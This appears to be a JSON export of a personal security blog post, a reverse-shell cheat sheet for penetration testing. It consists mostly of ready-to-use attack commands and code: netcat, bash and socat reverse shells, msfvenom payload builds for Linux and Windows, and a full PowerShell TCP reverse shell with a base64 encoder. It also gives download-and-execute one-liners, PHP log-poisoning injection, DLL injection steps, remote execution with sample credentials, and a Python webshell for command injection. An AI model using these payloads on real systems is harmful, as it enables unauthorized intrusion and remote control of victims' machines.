{"id":2288,"date":"2021-01-10T13:31:59","date_gmt":"2021-01-10T12:31:59","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2288"},"modified":"2024-12-03T20:25:52","modified_gmt":"2024-12-03T19:25:52","slug":"reverse-shell-2","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2288","title":{"rendered":"Reverse shell"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Important notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Don\u2019t try to over\u00adwrite uploaded reverse shell files. Use new names instead.<\/li>\n\n\n\n<li>If the process is killed and you need an asyn\u00adchron <em>system.run[\u201cat now &lt; \/tmp\/foo.sh\u201d]<\/em><\/li>\n\n\n\n<li>Wenn exploit\u00ading a local file inclu\u00adsion vul\u00adner\u00ada\u00adbil\u00adi\u00adty, it can be bet\u00adter to inject code which loads the actu\u00adal exploit code insteadt of inject\u00ading the exploit code directly.&nbsp;<ul class=\"wp-block-list\">\n<li>For <span class=\"caps\">HTTP<\/span>, use the fol\u00adlow\u00ading:<br><code>?page=&lt;?php echo system($_GET['cmd']); ?&gt;<\/code><br>or<br><code>User-Agent: Mozilla &lt;?php echo system($_GET['cmd']); ?&gt;<\/code><\/li>\n\n\n\n<li>Then use the cmd para\u00adme\u00adter to inject the actu\u00adal code.<br><code>GET \/index.php?page=\/var\/log\/apache2\/access.log&amp;cmd=%2Fbin%2Fbash%20...<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Linux<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">nc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">On the own system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">[rlwrap] nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution]<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the target:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -e \/bin\/sh 10.0.3.4 4444<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mknod \/tmp\/backpipe p\n\/bin\/sh 0&lt;\/tmp\/backpipe | nc $attacker 4444 1&gt;\/tmp\/backpipe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/$attacker\/4444 0&gt;&amp;1'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><em>If nc does\u00adn\u2019t seem on the sys\u00adtem: Try a Perl reverse shell!<\/em><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Bind shell<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">On the tar\u00adget, where the shell should be&nbsp;bound.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -lnvp 9998 -e \/bin\/bash<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the local attack system:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc $target 9998<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Socat<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">With <span class=\"caps\">TLS<\/span><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate a cer\u00adtifi\u00adcate before:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">openssl req -newkey rsa:4096 -nodes -keyout bind_shell.key -x509 -days 42 -out bind_shell.crt<br>cat bind_shell.key bind_shell.crt &gt; bind_shell.pem<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the own sys\u00adtem, start a listener:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:\/bin\/bash<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">On the (win\u00addows) tar\u00adget, poen&nbsp;it:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat.exe - OPENSSL:$attackerip,verify=0<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Without <span class=\"caps\">TLS<\/span><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00adnect to anoth\u00ader server:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat - TCP4:$target:4444<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open a listener:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat TCP4-LISTEN:4444 STDOUT<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Trans\u00adfer a&nbsp;file<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat TCP4-Listen:443,fork file:f.txt \/\/ on the target<br>socat TCP4:$target file:f.txt,create \/\/ on the local system<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat -d -d TCP4-LISTEN:443 STDOUT<br>socat TCP4:10.11.0.22:443 EXEC:\/bin\/bash<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Metasploit payloads<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">Normal reverse shell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p linux\/x86\/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f elf &gt; s32.elf\nmsfvenom -p linux\/x64\/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f elf &gt; s64.elf<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Meterpreter reverse shell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f elf &gt; mps32.elf\nmsfvenom -p linux\/x64\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f elf &gt; mps64.elf<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Normal shell for various languages<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Perl reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p cmd\/unix\/reverse_perl LHOST=$attackerip LPORT=443 -f raw<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Python reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p cmd\/unix\/reverse_python LHOST=$attackerip LPORT=443 -f raw<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">PHP<\/span> reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p php\/reverse_php LHOST=$attackerip LPORT=443 -f raw<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">PHP<\/span> meter\u00adpreter (Should this not work because a shell in meter\u00adpreter won\u2019t work, use nc to export the bash to a local nc listener.)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p php\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f raw<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">ASP-Reverse-Shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f asp &gt; s.asp<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Tomcat\/<span class=\"caps\">WAR<\/span> reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom \u2011p java\/jsp_shell_reverse_tcp LHOST=$attackerip LPORT=443 \u2011f war &gt; shell.war PowerShell reverse shell<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/x64\/meterpreter_reverse_tcp LHOST=$attackerip LPORT=443 -f psh --out reverse_shell.ps1<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">(If this doesn\u2019t work, use the make_reverse_powershell.py script <a href=\"https:\/\/gist.github.com\/tothi\/ab288fb523a4b32b51a53e542d40fe58\">or the orig\u00adi\u00adnal from here<\/a>.)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">JSP<\/span> reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p java\/jsp_shell_reverse_tcp LHOST=$attackerip LPORT=443 -f raw &gt; rs.jsp<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">JAR<\/span> reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p java\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f raw -o rs.jar<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Node\u00adJS reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p nodejs\/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f raw -o rs.js<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">*<span class=\"caps\">BSD<\/span><\/h2>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p bsd\/x64\/shell_reverse_tcp LHOST=$attackerip LPORT=3333 elf &gt; mps64.elf\nmsfvenom -p cmd\/unix\/reverse_openssl LHOST=$attackerip LPORT=3333<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Windows<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">nc<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">On the own sys\u00adtem: Start lis\u00adten\u00ader, see above. Then, on the target:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc.exe -e cmd.exe $attacker 4444<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Reverse shell<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Start a shell lis\u00adten\u00ader on the tar\u00adget (upload <code>nc.exe <\/code>before):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -dLp 4444 -e cmd.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00adnect from the own sys\u00adtem as usu\u00adal or in Metasploit:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">use multi\/handler<br>set LPORT 4444<br>set RHOST $target<br>set PAYLOAD payload\/windows\/x64\/shell_bind_tcp<br>run<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell reverse shell, Option 1<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Or: Use this reserve shell, made in Pow\u00ader\u00adShell (<strong><code>pwsh<\/code><\/strong> com\u00admand in&nbsp;Linux):<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"powershell\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>$Text = '$client = New-Object System.Net.Sockets.TCPClient(\"192.168.119.3\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"&gt; \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00advert it and put it e.g. in a para\u00adme\u00adter on a WIn\u00addows sys\u00adtem. To encode into base64:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>PS&gt; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)\nPS&gt; $EncodedText =[Convert]::ToBase64String($Bytes)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note that in this case you have to use the pow\u00ader\u00adshell com\u00admand with the \u2011enc para\u00adme\u00adter! Example:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>curl ...\/index.php?cmd=powershell%20-enc%20$base64here<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell reverse shell, Option 2<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Take direct\u00adly this Python script:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>import sys\nimport base64\n\npayload = '$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.1\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"&gt; \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'\n\ncmd = \"powershell -nop -w hidden -e \" + base64.b64encode(payload.encode('utf16')[2:]).decode()\n\nprint(cmd)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Change <span class=\"caps\">IP<\/span> and port and exe\u00adcute it to get a encod\u00aded com\u00admand line to exe\u00adcute a reverse shell.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell reverse shell via <span class=\"caps\">WMI<\/span> Windows Management Interface<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The <em><span class=\"caps\">WMI<\/span> Win\u00addows Man\u00adage\u00adment Inter\u00adface<\/em> enables remote access to Win\u00addows Sys\u00adtems via port 135. It is used by the wmic utilty (which is dep\u00adre\u00adcat\u00aded&nbsp;now).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Exe\u00adcute the fol\u00adlow\u00ading Pow\u00ader\u00adShell code, use as com\u00admand e.g. a Pow\u00ader\u00adShell reverse com\u00admand from the pre\u00advi\u00adous sections:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"powershell\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>$username = 'Peter';\n$password = 'Summer2002!';\n$command = '...';\n$target = '192.168.23.4';\n\n$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;\n$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;\n$options = New-CimSessionOption -Protocol DCOM\n$session = New-Cimsession -ComputerName $target -Credential $credential -SessionOption $Options \nInvoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell shell via PowerShell Remoting<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">This does not need a lis\u00adten\u00ader \u2014 it direct\u00adly opens a shell on anoth\u00ader system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Adapt and exe\u00adcute this with prop\u00ader parameters:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"powershell\" data-enlighter-theme data-enlighter-highlight data-enlighter-linenumbers data-enlighter-lineoffset data-enlighter-title data-enlighter-group>$username = 'Peter';\n$password = 'Summer2002!';\n$target = '192.168.23.4';\n$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;\n$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;\nNew-PSSession -ComputerName $target -Credential $credential<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then, change to the ses\u00adsion which was dis\u00adplay, here&nbsp;1:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Enter-PSSession 1<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Socat<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Cre\u00adate the cer\u00adtifi\u00adcate first, see above. Then, lis\u00adten on Windows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:'cmd.exe',pipes<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open from&nbsp;Linux:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">socat - OPENSSL:$attackerid:443,verify=0<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Powercat<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/besimorhino\/powercat\">Use Pow\u00ader\u00adcat <\/a>to lis\u00adten on a Win\u00addows host and cre\u00adate a base64-encod\u00aded Pow\u00ader\u00adShell pay\u00adload which can be exe\u00adcut\u00aded on the Win\u00addows host with\u00adout addi\u00adtion\u00adal software.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Cre\u00adate on the own Win\u00addows sys\u00adtem reverse shell code (or in pwsh on Kali):<br><code>PS&gt; . .\\powercat.ps1<br>PS&gt; powercat -c $attackerip -p 443 -e cmd.exe -ge &gt; b64shell.ps1<\/code><\/li>\n\n\n\n<li>Start nor\u00admal nc listener.<\/li>\n\n\n\n<li>On the tar\u00adget, exe\u00adcute the shell\u00adcode via copy<span class=\"amp\">&amp;<\/span>paste:<br><code>powershell.exe -E ZgB1AG4AYwB0AGkAb\u2026<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Short\u00ader approach:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http:\/\/192.168.11.11:8000\/powercat.ps1');powercat -c 192.168.12.12 -p 1111 -e powershell<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Visual Basic<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">VBS<\/span> \/ For very old <span class=\"caps\">IIS<\/span> web servers:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Dim objShell:Set objShell = WScript.CreateObject(\"WScript.Shell\"):objShell.Run \"cmd \/K certutil.exe -urlcache -split -f http:\/\/IP\/nc.exe C:\\users\\administrator\\Desktop\\nc.exe &amp; nc.exe -e cmd.exe IP Port\":Set objShell = Nothing<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">PowerShell<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Down\u00adload <a href=\"https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Shells\/Invoke-PowerShellTcp.ps1\">Invoke-PowerShellTcp.ps1<\/a><\/li>\n\n\n\n<li>Add at the bot\u00adtom a line for direct invo\u00adca\u00adtion:<br><code>Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.12 -Port 443<\/code><\/li>\n\n\n\n<li>Serve this file via&nbsp;<span class=\"caps\">HTTP<\/span>.<\/li>\n\n\n\n<li>Open nc handler<\/li>\n\n\n\n<li>Down\u00adload and exe\u00adcute the string direct\u00adly:<br><code>powershell -c iex(new-object net.webclient).downloadstring('http:\/\/10.10.14.12\/Invoke-PowerShellTcp.ps1')<\/code><\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">Metasploit payloads<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">Bind shell<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">Start nc lis\u00adten\u00ader on the own sys\u00adtem. On the tar\u00adget con\u00adnect with the fol\u00adlow\u00ading executeable:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/shell_reverse_tcp LHOST=$attackerip LPORT=443 -f exe &gt; root.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Normal reverse shell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -a x86 --platform windows -p windows\/shell\/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o s32.exe\nmsfvenom -a x64 --platform windows -p windows\/x64\/shell\/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o s64.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">Meterpreter reverse shell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom --platform windows -p windows\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o mps32.exe\nmsfvenom -a x64 --platform windows -p windows\/x64\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f exe -o mps64.exe<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"caps\">DLL<\/span> meterpreter reverse shell<\/h4>\n\n\n\n<pre id=\"block-9153fe47-c3b3-4c71-b989-c529d6f7691c\" class=\"wp-block-preformatted\">msfvenom --platform windows -p windows\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f dll -o mps32.dll\nmsfvenom -a x64 --platform windows -p windows\/x64\/meterpreter\/reverse_tcp LHOST=$attackerip LPORT=443 -f dll -o mps64.dll<\/pre>\n\n\n\n<h6 class=\"wp-block-heading\">Method 1: Injecting the <span class=\"caps\">DLL<\/span> into an existing process:<\/h6>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Upload the&nbsp;<span class=\"caps\">DLL<\/span><\/li>\n\n\n\n<li>Upload RemoveDLLInjector32.exe or RemoteDLLInjector64.exe<\/li>\n\n\n\n<li>Inject the pay\u00adload in an exist\u00ading process:<br><code>RemoveDLLInjector64.exe $pid $full_dll_file_path<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Keep in mind: If you <em>replace<\/em> a cus\u00adtom-made <span class=\"caps\">DLL<\/span>, then it could be that the app crash\u00ades short\u00adly after the first reverse shell because the app tried to call a func\u00adtion in your <span class=\"caps\">DLL<\/span> which is not&nbsp;there.<\/p>\n\n\n\n<h6 class=\"wp-block-heading\">Method 2: Loading the <span class=\"caps\">DLL<\/span> standalone<\/h6>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Upload the&nbsp;<span class=\"caps\">DLL<\/span><\/li>\n\n\n\n<li>Exe\u00adcute on the tar\u00adget <code>C:\\Windows\\System32\\rundll32.exe C:\\...\\payload.dll<\/code><\/li>\n<\/ol>\n\n\n\n<h4 class=\"wp-block-heading\"><span class=\"caps\">HTA<\/span> reverse shell<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">msf&gt; use exploit\/windows\/misc\/hta_server<br>msf&gt; ... run<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">You get an <span class=\"caps\">URL<\/span> with a <span class=\"caps\">HTA<\/span> pay\u00adload. On the tar\u00adget, just execute<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mshta.exe $attacker_paylaod<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">M<strong>ore options <\/strong>=&gt; <a href=\"https:\/\/book.hacktricks.xyz\/shells\/shells\/windows \">https:\/\/book.hacktricks.xyz\/shells\/shells\/windows <\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Webshell<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If you can exe\u00adcute com\u00admands via an injec\u00adtion in an <span class=\"caps\">URL<\/span>, use this Python script (from Alexander):<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">import requests\n import readline\n import urllib.parse\n url = \"http:\/\/10.10.10.218\/weather\/forecast\/index.php?city=\"\n msg = \"London');{}--\"\n def aggressive_url_encode(string):\n     return \"\".join(\"%{0:0&gt;2}\".format(format(ord(char), \"x\")) for char in string)\n while True:\n     #exploit = \"os.execute('{}');\".format(input(\"$ \").strip())\n     exploit = \"print('\\n'..io.popen('{} 2&gt;&amp;1'):read('*a'));\".format(input(\"$ \").strip().replace(\"'\", \"\\'\").replace('\"','\\\"'))\n     query = url+aggressive_url_encode(msg.format(exploit))\n     print(query)\n     print(requests.get(query).text)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Impor\u00adtant notes Lin\u00adux nc On the own sys\u00adtem: [rlwrap] nc \u2011lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] On the tar\u00adget: nc \u2011e \/bin\/sh 10.0.3.4 4444 Alter\u00adna\u00adtive: mkn\u00adod \/tmp\/backpipe p \/bin\/sh 0&lt;\/tmp\/backpipe | nc $attack\u00ader 4444 1&gt;\/tmp\/backpipe Alter\u00adna\u00adtive: \/bin\/bash \u2011c \u2018bash \u2011i &gt;<span class=\"amp\">&amp;<\/span> \/dev\/tcp\/$attacker\/4444 0&gt;<span class=\"amp\">&amp;<\/span>1\u2019 If nc does\u00adn\u2019t seem on the sys\u00adtem: Try a Perl reverse shell! Bind shell&nbsp;On&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,471],"tags":[63,332,56],"class_list":["post-2288","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-privesc","tag-metasploit","tag-msfvenom","tag-reverse-shell"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2288"}],"version-history":[{"count":43,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2288\/revisions"}],"predecessor-version":[{"id":4489,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2288\/revisions\/4489"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2288"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2288"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}